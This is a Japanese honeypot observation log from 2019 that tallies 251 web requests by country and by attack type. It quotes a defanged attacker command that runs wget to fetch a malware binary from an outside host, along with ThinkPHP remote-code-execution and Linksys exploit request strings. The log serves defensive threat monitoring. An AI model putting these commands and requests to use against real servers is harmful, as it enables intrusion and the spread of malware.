23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(116日目)

2019/07/10(水)

トータルは251件です。

ハンティングログは以下です。

90.65.150.4 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com
www.virustotal.com


IPのロケーション別の件数は以下です。

インド 164
中国 24
アメリ 19
ロシア 7
ブラジル 4
スペイン 3
トルコ 3
オランダ 3
イタリア 2
フランス 2
ドイツ 2
台湾 2
ウクライナ 2
バングラデシュ 2
リトアニア 1
イギリス 1
ハンガリー 1
チェコ 1
セントクリストファー・ネイビス 1
アルゼンチン 1
エクアドル 1
スロバキア 1
南アフリカ 1
ドミニカ 1
サウジアラビア 1
インドネシア 1

f:id:sec23:20190711142159p:plain

件数 概要 リクエス
164 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
60 アクセス GET /
7 不正中継の調査 GET hxxp[:]//110.249.212.46/testget?q=23333&port=80
2 不正中継の調査 GET hxxp[:]//172.247.32.25/ddd.html
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 サイト構成の調査 GET /sitemap.xml
1 不明 GET /script
1 クローリング GET /robots.txt
1 phpMyAdminの調査 GET /phpmyadmin/index.php
1 phpMyAdminの調査 GET /index.php
1 アクセス GET /favicon.ico
1 ShellShockの脆弱性の調査 GET /cgi-bin/authLogin.cgi
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt
1 Webサイトの非公開ファイルの調査 GET /.svn/entries